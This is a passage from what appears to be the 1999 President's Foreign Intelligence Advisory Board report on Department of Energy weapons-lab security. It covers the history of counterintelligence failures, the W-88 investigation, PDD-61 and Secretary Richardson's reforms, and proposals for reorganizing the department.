security; finds direction, coordination, conduct and oversight of safeguards and security activities throughout DOE warrant structural changes. …External CI review highlights DOE's inability to manage comprehensive approach to foreign threat; inadequate oversight, control over secret document inventory; uncoordinated computer security responsibilities. …'91 Four IG reports criticize security…GAO reports property, classified document control problems at LLNL; 10,000 documents unaccounted; inability of DOE to track, monitor, and correct security deficiencies … '87, '89, and '91 GAO reports foreign countries routinely obtaining unclassified but sensitive information that could assist nuclear programs. …Memo to President highlights previous security problems at DOE, Secretary's efforts to fix the deficiencies. …'92 Two IG reports on security…SSCI-requested CI assessment finds DOE headquarters lacks authority to direct labs, CI resources, and current threat information. …GAO cites weak internal security oversight controls; incomplete safeguards and security planning at DOE facilities. …DOE Order on CI issued. …DOE and FBI formalize relationship for conduct of CI activities. …Internal security report to Secretary finds "personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements." … Another report finds "Problems in management and oversight represent the most significant weakness" for the Department…and "security systems continue to be plagued with potential single point failures." ASSESSMENTS RESPONSIBILITY While cultural, structural, and historical problems have all figured into the management and security and counterintelligence failures of DOE, they should not be construed as an excuse for the deplorable irresponsibility within the agency, the pattern of inaction from those charged with implementation of policies, or the inconsistency of those in leadership positions. The panel identified numerous instances in which individuals were presented with glaring problems yet responded with foot–dragging, finger–pointing, bland reassurances, obfuscations, and even misrepresentations. The record of inattention and “false start” reforms goes back to the beginning of DOE. There have been several Presidents; National Security Advisors, Energy Secretaries, Deputy Secretaries, Assistant Secretaries, and Lab Directors; scores of DOE Office Directors and Lab managers; and a multitude of Energy Department bureaucrats and Lab scientists who all must shoulder the responsibility and accountability. As noted above, severe lapses in the security of the nation’s most critical technology, data, and materials were manifest at the creation of the DOE more than 20 years ago. Many, if not most, of the problems were identified repeatedly. Still, reforms flagged amid a lack of discipline and accountability. The fact that virtually every one of those problems persisted—indeed, many of the problems still exist—indicates a lack of sufficient attention by every President, Energy Secretary, and Congress. This determination is in no way a capitulation to the standard of “everyone is responsible, therefore no one is responsible.” Quite the contrary. Even a casual reading of the open–source reports on the Department’s problems presents one with a compelling narrative of incompetency that should have merited the aggressive action of the nation’s leadership. Few transgressions could violate the national trust more than inattention to one’s direct responsibility for controlling the technology of weapons of mass destruction. The PFIAB panel was not empowered, nor was it charged, to make determinations of whether specific acts of espionage or malfeasance occurred regarding alleged security lapses at the weapons labs. Nor was it tasked to issue performance appraisals of the various Presidents, Energy Secretaries, or members of the Congressional leadership during their respective terms in office. However, an inquiry into the extent to which the system of administrative accountability and responsibility broke down at various times in history has been necessary to fulfill our charter. In fairness, we have tried to examine the nature of the security problems at DOE’s weapons labs in many respects and at many levels, ranging from the circumstances of individuals and the dynamics of group behavior to the effectiveness of mid–level management, the clarity of the laws and regulations affecting the Department, and the effectiveness of leadership initiatives. THE RECORD OF THE CLINTON TEAM To its credit, in the past two years the Clinton Administration has proposed and begun to implement some of the most far–reaching reforms in DOE’s history. The 1998 Presidential Decision Directive on DOE counterintelligence (PDD-61) and Secretary Richardson’s initiatives are both substantial and positive steps. We offer an analysis of some of these initiatives, and their likelihood of success, elsewhere in this chapter and elsewhere in this report. However, the speed and sweep of the Administration’s ongoing response does not absolve it of its responsibility in years past. At the outset of the Clinton Administration—in 1993, when it inherited responsibility for DOE and the glaring record of mismanagement of the weapons laboratories—the incoming leadership did not give the security and counterintelligence problems at the labs the priority and attention they warranted. It will be incumbent on the DOE transition team for the incoming administration in 2001 to pay particular heed to these issues. While the track record of previous administrations’ responses to DOE’s problems is mixed (see box on previous administrations, on pp. 26-27), the panel members believe that the gravity of the security and counterintelligence mismanagement at the Department will, and should, overshadow post facto claims of due diligence by any administration—including the current one. Asserting that the degree of failure or success with DOE from one administration to the next is relative is, one might say, gilding a figleaf. The fact is that each successive administration had more evidence of DOE’s systemic failures in hand: the Reagan Administration arrived to find several years’ worth of troubling evidence from the Carter, Ford, and Nixon years; the evidence had mounted higher by the time that the Bush Administration took over; and higher still when the Clinton Administration came in. The Clinton Administration has acted forcefully, but it took pressure from below and outside the Administration to get the attention of the leadership, and there is some evidence to raise questions about whether its actions came later than they should have, given the course of events that led the recent flurry of activity. Clinton Administration Track Record O’Leary: Jan ’93–Jan ’97 ’93 New Secretary works to make labs more open…launches major declassification effort. … DOE ’92 Annual Report to President does not mention security problems highlighted same year in reports to Secretary .… GAO criticizes DOE’s ineffective management of personnel security cases. …Four IG reports on security…Internal report to Secretary on computer security uncovers lack of access controls; no configuration management; failure to perform management reviews. …’94 Three IG reports on security…FBI detailees to DOE recalled because of “lack of control of the CI program by DOE HQ.” …Internal report finds classified and unclassified information on lab computer network. …GAO reports computer security deficiencies found in 1985 at six facilities still not fixed. …’95 Four IG reports on security…Congress considers numerous bills between ’95–’99 to abolish DOE. … “Galvin Task Force” offers SEAB options for change within the labs. … “Walk-in” provides documents containing sensitive U.S. nuclear information. …DOE officials meet with FBI regarding potential espionage involving nuclear weapons data. …Analysis group formed at DOE to review Chinese weapons program; senior DOE, CIA, White House officials discuss options. … GAO reports on poor management of nuclear material tracking capabilities …Laboratory Operations (oversight) Board created. …’96 First three lab-to-lab exchanges between U.S. and China. …Internal DOE report discovers required nuclear material physical inventories not being performed. … Two IG reports on security…DOE Deputy Secretary directs six “initiatives” to lab directors and field office heads for the foreign visitors and CI programs (most initiatives ignored after he leaves DOE in 1997.) Pena: Mar ’97–Jun ’98 ’97 Mar New Secretary confirmed. … FBI report to Congress and DOE critical of DOE CI capabilities; addresses CI program oversight, foreign visits and assignments, CI analysis, professional training/CI awareness. … FBI Director personally delivers CI review to Secretary. …Two additional Lab–to–Lab exchanges held in Beijing. … DOE staff briefs Congressional staff, and NSC, CIA, FBI senior officials on Chinese nuclear program, possible Chinese espionage before Secretary informed…DOE increases budget for CI in FY 1997, hires more CI professionals. …Inter-agency Working Group reports that systemic and serious CI and security problems at DOE have been well documented over at least a ten year period … few of the recommendations in the past studies have been implemented, … A senior CI official states “There is every reason to believe the labs will resist” any outside assistance … National Security Advisor requests independent assessment of China's nuclear program and the impact of U.S. nuclear information. …Two DOE internal reports cite confusing, fragmented, dysfunctional security management structure. …External report finds multiple, uncoordinated internal and external oversight activities. …DCI and FBI Director meet with Secretary to discuss DOE CI problem and reform plan; … meeting notes state “Despite all the studies conducted, experience over time has shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” … Internal DOE report states “in all candor, we have been hampered in meeting [the safeguards and security] obligations by organizational obstacles and competing internal interests.” … PDD–61 drafted, coordinated in inter-agency process. …DOE’s Laboratory Operations Board finds “inefficiencies due to the Department's complicated management structure.” …Peter Lee (formerly of LLNL) pleads guilty, inter alia, to transmitting classified national defense information to representatives of the PRC in ’85. …GAO finds faulty procedures for foreign visitor indices checks and controlling dissemination of sensitive information; lack of clear criteria for identifying visits that involve sensitive subjects; indirect and inconsistent CI funding; DOE CI programs not based on comprehensive assessment of foreign espionage threat. …Institute of Defense Analyses’ “120 Day Report” finds inadequate management of DOE workforce and confusing chains of com-mand. …’98 Feb. President signs PDD-61. …External report says DOE management and oversight of security problematic …Security Management Board created by Congress, meets twice in next 18 months…CIA/FBI report provided to Congress on Chinese espionage activities. … Jun 30 Secretary resigns, Deputy designated as Acting Secretary. … DOE’s 90-day report on CI reveals problems remain regarding separate management of classified and unclassified information. …Lab-to-lab exchange held in Beijing. Richardson: Aug ’98 – ’98 Aug 18 New Secretary sworn in …GAO again finds problems in DOE’s foreign visitor program; notes lack of clear procedures for identifying sensitive subjects. …External report highlights lack of DOE oversight expertise and ad hoc security structure. … Per PDD–61, assessment of the foreign collection threat against DOE published. …'99 DOE security review finds “unhealthy, adversarial environment of mistrust among DOE security organizations,” recommends several management process changes …Cox Committee publishes report…Lab-to-Lab exchange held in Beijing. …President directs PFIAB to review security, CI at labs; directs Intelligence Community to conduct damage assessment of possible security breaches at labs; directs CI community to review security of nuclear weapons information in USG. …DOE CI Implementation Plan delivered to Secretary. …GAO reports inadequate separation of classified and unclassified computer networks at same lab in 1988, 1992, 1994, and 1998. … “Chiles Report” describes management problems in nuclear weapons program. …Internal DOE report highlights computer security problems at a lab. … DOE counterintelligence implementation plan (per PDD–61) issued to labs. … DOE shuts down all classified computers at LANL, LLNL, and SNL. … DOE holds tri-lab computer security conference. … Secretary announces new security organization at DOE, to be headed by a “security czar.” THE 1995 ‘WALK-IN’ DOCUMENT In 1995, a U.S. intelligence agency obtained information that has come to be called the “walk-in” document. A copy of a classified PRC report, it contains a discussion of various U.S. nuclear warheads. The PFIAB has carefully reviewed this document, related information, and the circumstances surrounding its delivery. Serious questions remain as to when it was written, why it was written, and why it was provided to the U.S. We need not resolve these questions. The document unquestionably contains some information that is still highly sensitive, including descriptions, in varying degrees of specificity, of technical characteristics of seven U.S. thermonuclear warheads. This information had been widely available within the U.S. nuclear weapons community, including the weapons labs, other parts of DOE, the Department of Defense, and private contractors, for more than a decade. For example, key technical information concerning the W–88 warhead had been available to numerous U.S. government and military entities since at least 1983 and could well have come from many organizations other than the weapons labs. W-88 INVESTIGATION Despite the disclosure of information concerning seven warheads, despite the potential that the source or sources of these disclosures were other than the bomb designers at the national weapons labs, and despite the potential that the disclosures occurred as early as 1982, only one investigation was initiated. That investigation focused on only one warhead, the W–88, only one category of potential sources—bomb designers at the national labs—and on only a four-year window of opportunity. It should have been pursued in a more comprehensive manner. The allegations raised in the investigation should still be pursued vigorously. And the inquiry should be fully explored—regardless of the conclusions that may result. The episode began as an administrative inquiry conducted by the DOE Office of Energy Intelligence, with limited assistance from the FBI. It developed into an FBI investigation, which is still under way today. Allegations concerning this case and related activities high-lighted the need for improvements in the DOE’s counterintelligence program, led along the way to the issuance of a Presidential Decision Directive revamping the DOE’s counterintelligence program, formed a substantial part of the information underlying the Cox Committee’s conclusions on nuclear weapons information, and ultimately led, at least in part, to the President’s decision to ask this Board to evaluate security and counterintelligence at the DOE’s weapons labs. It is not within the mandate of our review to solve the W–88 case or any other potential compromises of nuclear weapons information. Further, it is not within our mandate to conduct a comprehensive and conclusive evaluation of the handling of the W–88 investigation by the DOJ and FBI. In fact, as we understand it, that is the purpose of a task force recently appointed by the Attorney General. We trust that among the issues that the task force will resolve are: Whether the FBI committed sufficient resources, including agents with appropriate expertise, and demonstrated a sense of urgency commensurate with an apparent compromise of classified U.S. nuclear weapons information; Whether the DOJ Office of Intelligence Policy Review (OIPR) applied an inappropriately high standard to the FBI’s request for electronic surveillance under the Foreign Intelligence Surveillance Act (FISA); Whether the FBI provided to DOJ OIPR all U.S. government information relevant to an appropriate evaluation of the FBI’s FISA request; Why the FBI’s FISA request did not include a request to monitor or search the subject’s workplace computer systems, particularly since an attorney in the FBI’s General Counsel Office had provided an opinion in 1996 that such monitoring or searching in this case would require FISA authorization; Why the FBI did not learn until recently that in 1995 the subject had executed a series of waivers authorizing monitoring of his workplace computer systems; Whether the FBI adequately raised to the Attorney General the FBI’s concerns over the declination of the FISA request; Whether communications regarding the subject’s job tenure broke down between DOE, FBI, and Los Alamos; Whether the DOJ OIPR maintained appropriate records concerning FISA requests that were declined; Whether the FBI appropriately relied on technical opinions provided by the DOE; Why DOE, rather than the FBI, conducted the first polygraph examination in this case when the case was an open FBI investigation; and, perhaps most importantly, Whether additional cases should be opened to investigate whether the apparent disclosures may have arisen out of organizations other than Los Alamos lab. Again, resolving these issues is not within our mandate. It is, however, explicitly within our mandate to identify additional steps that may need to be taken to address the security and counterintelligence threats to the weapons labs. Also, it is within our standing PFIAB obligation under Executive Order 12863 to assess the adequacy of counterintelligence activities beyond the labs. In this regard, what we have learned from our limited review of the W-88 case and other cases are significant lessons that extend well beyond these particular cases. These lessons relate directly to additional steps we believe must be taken to strengthen our safeguards against current security and foreign intelligence threats. Those steps are discussed further in the Classified Appendix to this report. We have learned, for example, that under the current personnel security clearance system a person who is under FBI investigation for suspected counterintelligence activities may sometimes be granted a new or renewed clearance. We also have learned that although the written standards for granting a first clearance and for renewing an existing clearance may be identical, the actual practice that has developed—certainly within DOE and we strongly suspect elsewhere—is that clearance renewals will be granted on a lower standard. We find such inconsistency unacceptable. We think it appropriate for the National Security Council to review and resolve these issues. We have also learned that the legal weapons designed to fight the counterintelligence battles of the 70s have not necessarily been rigorously adapted to fight the counterintelligence battles of the 90s (and beyond). For example, with the passage of more than twenty years since the enactment of the Foreign Intelligence Surveillance Act (FISA) of 1978, it may no longer be adequate to address the counterintelligence threats of the new millennium. We take no position on whether the statute itself needs to be changed. It may well still be sufficient. However, based on all of the information we have reviewed and the interviews we have conducted, and without expressing a view as to the appropriateness of the DOJ decision in the W–88 case, we do believe that the Department of Justice may be applying the FISA in a manner that is too restrictive, particularly in light of the evolution of a very sophisticated counterintelligence threat and the ongoing revolution in information systems. We also are concerned by the lack of uniform application across the government of various other investigative tools, such as employee waivers that grant officials appropriate authority to monitor sensitive government computer systems. Moreover, there does not exist today a systematic process to ensure that the competing interests of law enforcement and national security are appropriately balanced. Law enforcement, rightly so, is committed to building prosecutable cases. This goal is often furthered by leaving an espionage suspect in place to facilitate the gathering of more evidence. The national security interest, in contrast, is often furthered by immediately removing a suspect from access to sensitive information to avoid additional compromises. Striking the proper balance is never easy. It is made all the more difficult when there is no regular process to ensure that balance is struck. We have learned in our review that this difficult decision often is made by officials who either are too focused on the investigative details or are too unaware of the details to make a balanced decision. This is another matter deserving National Security Council attention. PFIAB EVALUATION OF THE INTELLIGENCE COMMUNITY DAMAGE ASSESSMENT Following receipt of the “walk-in” document, CIA, DOE, Congress, and others conducted numerous analyses in an effort to determine the extent of the classified nuclear weapons information the PRC has acquired and the resultant threat to U.S. national security. Opinions expressed in the media and elsewhere have ranged from one extreme to the other. On one end of the spectrum is the view that the Chinese have acquired very little classified information and can do little with it. On the other end is the view that the Chinese have nearly duplicated the W–88 warhead. After reviewing the available intelligence and interviewing the major participants in many of these studies, we conclude that none of these extreme views holds water. For us, the most accurate assessment of China’s acquisition of classified U.S. nuclear weapons information and the resultant threat to U.S. national security is presented in the April 1999 Intelligence Community Damage Assessment. Written by a team of experts, this assessment was reviewed and endorsed by an independent panel of national security and nuclear weapons specialists, chaired by Admiral David Jeremiah. We substantially agree with the assessment’s analysis and endorse its key findings. The full text of the assessment’s unclassified summary appears in the unclassified appendix. PRESIDENTIAL DECISION DIRECTIVE 61: BIRTH AND INTENT In mid–1997, it became clear to an increasingly broader range of senior administration officials that DOE’s counterintelligence program was in serious trouble.1 In late July, DOE officials briefed the President’s National Security Advisor, who concluded that, while the real magnitude and national security implications of the suspected espionage needed closer scrutiny, there was nonetheless a solid basis for taking steps to strengthen counterintelligence measures at the labs. He requested an independent CIA assessment of China’s nuclear program and the impact of U.S. nuclear information, and he directed that the National Counterintelligence Policy Board (NACIPB)2 review the DOE counterintelligence program. That September, the National Security Advisor received the CIA assessment, and the NACIPB reported back that it had found “systemic and serious CI and security problems at DOE [had] been well documented over at least a ten year period” and “few of the recommendations in the past studies [had] been implemented.” The NACIPB made 25 recommendations to significantly restructure the DOE CI program; it also proposed that a Presidential Decision Directive or Executive Order be handed down to effect these changes. At an October 15 meeting, the Director of Central Intelligence and the FBI Director discussed with Secretary Pena and his Deputy Secretary the need to reform the DOE CI program. The DCI and FBI Director sought to make clear there was an urgent need to act immediately, and “despite all the studies conducted, experience over time [had] shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” All agreed to develop an action plan that would serve as the basis for a Presidential Decision Directive. Several senior officials involved felt that the necessary reforms would—without the mandate of a Presidential directive—have little hope of overcoming the anticipated bureaucratic resistance, both at DOE headquarters and at the labs. There was a clear fear that, “if the Secretary spoke, the bureaucracy wouldn’t listen; if the President spoke, the bureaucracy might at least listen.” That winter, the NSC coordinated a draft PDD between and among the many agencies and departments involved. Serious disagreements arose over several issues, particularly the creation of independent reporting lines to the Secretary for the Intelligence and Counterintelligence Offices. Also at issue was the subordination of the CI officers at the labs. Much of the resistance stemmed simply from individuals interested in preserving their turf won in previous DOE bureaucratic battles. After much bureaucratic maneuvering and even vicious in–fighting, these issues were finally resolved, or so it seemed; and on February 11, 1998, the President signed and issued the directive as PDD-61. The full PDD remains classified. An unclassified summary, which contains all significant provisions, is set forth in the unclassified annex. In our view, among the most significant of the 13 initiatives directed by PDD-61 are: The CI and foreign intelligence (FI) elements would be reconfigured into two independent offices and report directly to the Secretary of Energy; The Director of the new Office of CI (OCI) would be a senior executive from the FBI and would have direct access to the Secretary of Energy, the DCI and the Director of the FBI; Existing DOE contracts with the labs would be amended to include CI program goals and objectives and performance measures to evaluate compliance with these contractual obligations, and CI personnel assigned to the labs would have direct access to the lab directors and would concurrently report to the Director, OCI; The incoming Director, OCI would prepare a report for the Secretary of Energy ninety days after his arrival that would address progress on the initiative, a strategic plan for achieving long-term goals, and recommendations on whether and to what extent other organizational changes may be necessary to strengthen CI; and, Within 120 days, the Secretary of Energy would advise the Assistant to the President for National Security Affairs on the actions taken and specific remedies designed to implement this directive. On April 1, 1998, a senior executive from the FBI assumed his duties as the Director of the OCI, and began his 90–day study. He completed and forwarded it to the Secretary of Energy on July 1, the day after Secretary Pena resigned. The Acting Secretary led a review of the study and its recommendations. On August 18, Secretary Richardson was sworn in. On November 13, he submitted the action plan required by the PDD to the National Security Advisor. Secretary Richardson continued to develop an implementation plan. The completed implementation plan was delivered to Secretary Richardson on February 3, 1999, and issued to the labs on March 4. TIMELINESS OF PDD–61 Criticism has been raised that the PDD took too long to be issued and has taken too long to implement. Although the current National Security Advisor was briefed on counterintelligence concerns by DOE officials in April of 1996, we are not convinced that the briefing provided a sufficient basis to require initiation of a broad Presidential directive at that time. We are convinced, however, that the July 1997 briefing, which we are persuaded was much more comprehensive, was sufficient to warrant aggressive White House action. We believe that while the resulting PDD was developed and issued within a customary amount of time, these issues had such national security gravity that it should have been handled with more dispatch. That there were disagreements over various issues is not surprising; that the DOE bureaucracy dug in its heels so deeply in resisting clearly needed reform is very disturbing. In fact, we believe that the NACIPB, created by PDD in 1994, was a critical factor in ram–rodding the PDD through to signature. Before 1994, there was no real structure or effective process for handling these kinds of issues in a methodical way. Had the new structure not been in place and working, we doubt if the PDD would have made it. With regard to timeliness of implementation, we have far greater concern. It is not unreasonable to expect that senior DOE officials would require some time to evaluate the new OCI Director’s 90–day study, and we are aware that Secretary Richardson did not assume his DOE duties until mid–August. However, we find unacceptable the more than four months that elapsed before DOE advised the National Security Advisor on the actions taken and specific remedies developed to implement the Presidential directive, particularly one so crucial. More critically, we are disturbed by bureaucratic foot–dragging and even recalcitrance that ensued after issuance of the Presidential Decision Directive. Severe disagreements erupted over several issues, including whether the CI program would apply to all of the labs, not just the weapons labs, and the extent to which polygraph examinations would be used in the personnel security program. We understand that some DOE officials declined to assist in the implementation simply by declaring that, “It won’t work.” The polygraph program was finally accepted into the DOE’s security reforms only after the National Security Advisor and the DCI personally interceded. The fact that the Secretary’s implementation plan was not issued to the labs until more than a year after the PDD was issued tells us DOE is still unconvinced of Presidential authority. We find worrisome the reports of repeated and recent resistance by Office of Management and Budget officials to requests for funding to implement the counterintelligence reforms mandated by PDD-61. We find vexing the reports we heard of OMB budgeteers lecturing other government officials on the “unimportance” of counterintelligence at DOE. SECRETARY RICHARDSON’S INITIATIVES Since November of 1998 and especially since April of this year, Secretary Richardson has taken commendable steps to address DOE’s security and counterintelligence deficiencies. In November of last year, in the action plan required by PDD-61, Secretary Richardson detailed 31 actions to be taken to reform DOE’s counterintelligence program. These actions addressed the structure of the counterintelligence program, selection and training of field counterintelligence personnel, counterintelligence analysis, counterintelligence and security awareness, protections against potential “insider threats,” computer security, and relationships with the FBI, the Central Intelligence Agency, and the National Security Agency. Though many matters addressed in the action plan would require further evaluation before specific actions would be taken, immediate steps included granting to the Office of Counterintelligence (OCI) direct responsibility for programming and funding counterintelligence activities of all DOE field offices and laboratories; granting the Director, OCI the sole authority to propose candidates to serve as the counterintelligence officers at the weapons labs; and instituting a policy for a polygraph program for employees with access to sensitive information. In April of 1999, in an effort to eliminate multiple reporting channels and improve lines of communications, direction and accountability, Secretary Richardson ordered changes in the department’s management structure. In short, each of the 11 field offices reports to a Lead Program Secretarial Office (LPSO). The LPSO has “overall line accountability for site-wide environment, safety and health, for safeguards and security and for the implementation of policy promulgated by headquarters staff and support functions.” A newly established Field Management Council is to be charged with program integration. In May of 1999, Secretary Richardson announced substantial restructuring of the security apparatus at DOE. Among these is the new Office of Security and Emergency Operations, responsible for all safeguards and security policy, cyber–security, and emergency functions throughout DOE. It will report directly to the Secretary and consist of the Office of the Chief Information Officer, and Office of Emergency Management and Response, and an Office of Security Affairs, which will include the Office of Safeguards and Security, the Office of Nuclear and National Security Information, the Office of Foreign Visits and Assignments, and the Office of Plutonium, Uranium, and Special Material Inventory. Also announced was the creation of the Office of Independent Oversight and Performance Assurance. It also will report directly to the Secretary to provide independent oversight for safeguards and security, special nuclear materials accountability, and other related areas. To support additional cyber-security improvements, DOE will be asking Congress for an additional $50 million over the next two years. Improvements are to include continual monitoring of DOE computers for unauthorized and improper use. New controls will also be placed on computers and workstations, removable media, removable drives, and other devices that could be used to download files. In addition, warning “banners” are now mandatory on all computer systems to alert users that these systems are subject to search and review at the government’s discretion. Cyber–security training is also to be improved. Secretary Richardson further announced additional measures designed to strengthen DOE’s counterintelligence program. They include: a requirement that DOE officials responsible for maintaining personnel security clearances be notified of any information that might affect the issuance or maintenance of such a clearance, even when the information does not rise to the level of a criminal charge; and mandatory reporting by all DOE employees of any substantive contact with foreign nationals from sensitive countries. DOE also plans to strengthen its Security Management Board; accelerate actions necessary to correct deficiencies in security identified in the 1997/1998 Annual Report to the President on Safeguards and Security; expedite improvements in the physical security of DOE nuclear weapons sites; and delay the automatic declassification of documents more than 25 years old. In sum, as of mid-June of 1999, progress has been made in addressing counterintelligence and security. Of note, all of the PDD–61 requirements are reported to have been substantially implemented. Other important steps also reportedly have been completed. Among these are the assignment of experienced counterintelligence officers to the weapons labs. PROSPECTS FOR REFORMS Although we applaud Secretary Richardson’s initiative, we seriously doubt that his initiatives will achieve lasting success. Though certainly significant steps in the right direction, Secretary Richardson’s initiatives have not yet solved the many problems. Significant objectives, all of which were identified in the DOE OCI study completed nearly a year ago, have not yet been fully achieved. Among these unmet objectives are revising the DOE policy on foreign visits and establishing an effective polygraph examination program for selected, high–risk programs. Moreover, the Richardson initiatives simply do not go far enough. These moves have not yet accomplished some of the smallest fixes—despite huge levels of attention and Secretarial priority. Consider the following example: with all the emphasis of late on computer security, including a weeks–long stand–down of the weapons labs computer systems directed by the Secretary, the stark fact remains that, as of the date of this report, a nefarious employee can still download secret nuclear weapons information to a tape, put it in his or her pocket, and walk out the door. Money cannot really be the issue. The annual DOE budget is already $18 billion. There must be some other reason. Under the Richardson plan, even if the new “Security Czar” is given complete authority over the more than $800 million ostensibly allocated each year to security of nuclear weapons-related functions in DOE, he will still have to cross borders into other people’s fiefdoms, causing certain turmoil and infighting. If he gets no direct budget authority, he will be left with little more than policy guidance. Even then, as the head of a staff office, under the most recent Secretary Richardson reorganization he has to get the approval of yet another fiefdom, the newly created Field Management Council, before he can issue policy guidance. Moreover, he is unlikely to have much success in obtaining approval from that body when he is not even a member—and the majority of those who are members are the very program managers that his policy guidance would affect. TROUBLE AHEAD Perhaps the most troubling aspect of the PFIAB’s inquiry is the evidence that the lab bureaucracies—after months at the epicenter of an espionage scandal with serious implications for U.S. foreign policy—are still resisting reforms. Equally disconcerting, other agencies have joined the security skeptics list. In the past few weeks, officials from DOE and other agencies have reported to us: There is a heightened attention to security at the most senior levels of DOE and the labs, but at the mid–level tiers of management there has been lackluster response and “business as usual.” Unclassified but sensitive computer networks at several weapons labs are still riddled with vulnerabilities. Buildings that do not meet DOE security standards are still being used for open storage of weapons parts. Foreign nationals—some from sensitive countries—residing outside a weapons lab have remote dial-up access to unclassified networks without any monitoring by the lab. In an area of a weapons lab frequented by foreign nationals, a safe containing restricted data was found unsecured. It had not been checked by guards since August 1998. When confronted with the violation, a mid–level official is said to have implied that it was not an actual security lapse because the lock had to be “jiggled” to open the safe door. A weapons lab was instructed to monitor its outgoing email for possible security lapses. The lab took the minimal action necessary; it began monitoring emails but did not monitor the files attached to emails. When Secretary Richardson ordered the recent computer stand-down, there was great resistance, and when it came time to decide if the labs’ computers could be turned on again, a bevy of DOE officials fought to have final approval power. BACK TO THE FUTURE In 1976, federal officials conducted a study of the nation’s nuclear weapons laboratories and plants. In trying to devise a coherent and viable way of managing the labs, they settled on three possible solutions: place the weapons labs under the Department of Defense, make them a free–standing agency, or leave them within the Energy Research and Development Administration. Congress chose to leave the weapons labs within ERDA, the successor agency of the Atomic Energy Commission. Nearly a decade later, the oversight of the weapons labs was still of great concern. Senators Sam Nunn and John Warner led a push to place the weapons labs under the auspices of the Department of Defense. However, the Reagan Administration staved off their effort by agreeing to put together a blue–ribbon panel to study the issue. The panel studied the problem for six months and issued a report in July, 1985. Again, Congress and federal officials weighed whether the weapons labs should be transferred to the Department of Defense or restructured to be given more autonomy. The status quo prevailed. The weapons labs stayed within the Department of Energy. As this report has detailed, problems in the managerial relationship between DOE and the weapons labs have persisted, perhaps even increased, over the past 14 years. Indeed, the discussion today sounds hauntingly familiar to the discussions in the 1980s and 1970s. Today, however, there is a difference. The record of mismanagement of the weapons labs in matters of security and counterintelligence has become so long and so compelling as to demand a rejection of the status quo. There can be no doubt that the current structure of the Department of Energy has failed to give the nation’s weapons laboratories the level of care and attention they warrant. Thus, our panel is recommending deep and lasting structural change that will give the weapons laboratories the accountability, clear lines of authority, and priority they deserve. REORGANIZATION What makes a government agency run well? There are a multitude of characteristics that arguably can make for an efficient and effective government agency or department. This Panel holds no illusions about the completeness of its understanding nor the purity of its wisdom regarding government bureaucracies. Indeed, some people would say that truly comprehending the inner workings of a federal department is the intellectual equivalent of grasping the enormity of the universe. Over the course of many years, however, we, as members of the President’s Foreign Intelligence Advisory Board, have evaluated the performance of numerous federal entities, from the Department of Defense to the Foreign Broadcast Information Service. Some, we found, were in good order, others in pretty bad shape. In that sense, we believe we do know a lot about what makes some agencies work and not work. Although somewhat subjective and by no means exhaustive, our list of “good” things to look for includes several attributes. LEADERSHIP Certainly at the top, but also throughout the organization. The leaders and managers set the standards and expectations regarding performance and accountability. They are the foundation upon which a successful organizational culture is built. If management sets, demonstrates and enforces high standards for performance and accountability, there is a strong likelihood that the organization will follow. And, longevity is a key ingredient. For example, Daniel S. Goldin, Administrator of the National Aeronautics and Space Administration (NASA), was named to his post in the spring of 1992. Goldin has won considerable acclaim for demanding nothing but the best from his employees, and thereby turning around a bureaucracy that had become ossified and recalcitrant to higher authority, including the President. He did not do it overnight, though. His “watch” is now seven years long and still going. By contrast, the average stay for an Energy Secretary has been about two and a half years; a Deputy Secretary, less than two years; and an Under Secretary, less than 18 months.1 CLARITY OF MISSION Employees must know who they are and why they are there. Mission statements may seem corny to some, but from our experience good ones work. NASA’s is crisp, clear and bold: “NASA is an investment in America’s future. As explorers, pioneers and innovators, we boldly expand frontiers in air and space to inspire and serve America, and to benefit the quality of life on Earth.” The Energy Department also declares itself a department of the future; it’s slogan is “Science, Security and Energy: Powering the 21st Century.” However, we wonder if the DOE employees in the field really have a sense of purpose and direction. Those at the Oakland Operations Office are challenged to, “serve the public by executing programs and performing DOE contract management.” At Albuquerque Operations Office, the rallying cry is, “to contribute to the welfare of the nation by providing field-level federal management to assure effective, efficient, safe and secure accomplishment of the Department’s national defense, environmental quality, science and technology, technology transfer and commercialization and national energy objectives.”2 DEDICATION TO EXCELLENCE It is the responsibility of leadership to emphasize continuously and top-to-bottom the absolute importance of quality of performance. People truly dedicated to excellence usually achieve it. EMPHASIS ON CORE COMPETENCIES Those agencies that constantly emphasize the business areas in which they must absolutely excel, usually do so. At NASA, we are told, rarely, if ever, does the Administrator give a speech in which safety is not emphasized. DOE has appropriately emphasized excellence in the quality of its scientific and technical work, but only recently has begun to emphasize security, and only in recent months has articulated the importance of counterintelligence. The panel was hard pressed to find either words mentioned in speeches by most of Secretary Richardson’s predecessors. MINIMAL POLITICAL PRESSURES Blessed is the government manager whose operations fall into only a handful of Congressional districts and under the purview of only a couple of oversight committees. It doesn't take a nuclear scientist to understand that the more Congressional districts and committees with which a federal agency must contend, the more it is politically whip–sawed in its priorities and stuffed with pork. We suspect the Department of Energy probably holds some federal records: its multitudinous and widely cast operations come under the scrutiny of no less than 18 Congressional committees and fund well-paying federal and contractor jobs in more than 50 congressional districts. STREAMLINED FIELD OPERATIONS In just about any endeavor, but especially in managing government contracts, simpler is better. Managing government contracts has become a major function in more and more agencies and departments as they seek to cut costs. We know of a few good examples of agencies where this effort is both efficient and effective. One is the National Reconnaissance Office (NRO), a semi-autonomous Defense Department agency, which has long managed huge contracts with major industrial firms that have built and help operate our nation's surveillance satellites. The NRO, however, came under heavy fire several years ago for budget irregularities, partly as a result of tangled lines of bureaucratic authority. Today, after some substantial streamlining, multi-million dollar contracts are run out of program management offices at NRO Headquarters on a line of accountability leading directly to the contracting company. Rather than maintaining large field offices, the NRO employs only a handful of representatives in the field—typically only one or two people resident at their largest contractors. The rest is done from Washington. To manage their largest contracts, no more than 15 contracting officers—from worker–level to management —are involved. Some are worth several billion dollars. Currently, the NRO manages over 1,000 contracts worldwide, with a combined value numbering in the tens of billions of dollars. They manage these contracts using a staff of approximately 250 contract officers.3 Though we acknowledge that there are differences between the missions of NRO’s satellite contractors and DOE’s nuclear weapons lab contractors, we are stunned by the huge numbers of DOE employees involved in overseeing a weapons lab contract. For example, Sandia National Weapons Laboratory, a contractor–operated facility in New Mexico, has several layers of Energy Department employees with whom it must deal: the Kirtland (Air Force Base) Area Office, with about 55 “feds,” which is subordinate to the Albuquerque Field Office (AFO), which has a total complement of about 1,300 government workers. Albuquerque also monitors contracts with Los Alamos National Lab (through a Los Alamos Area Office of some 70 people), and several other contractors throughout the southern United States. Notably, 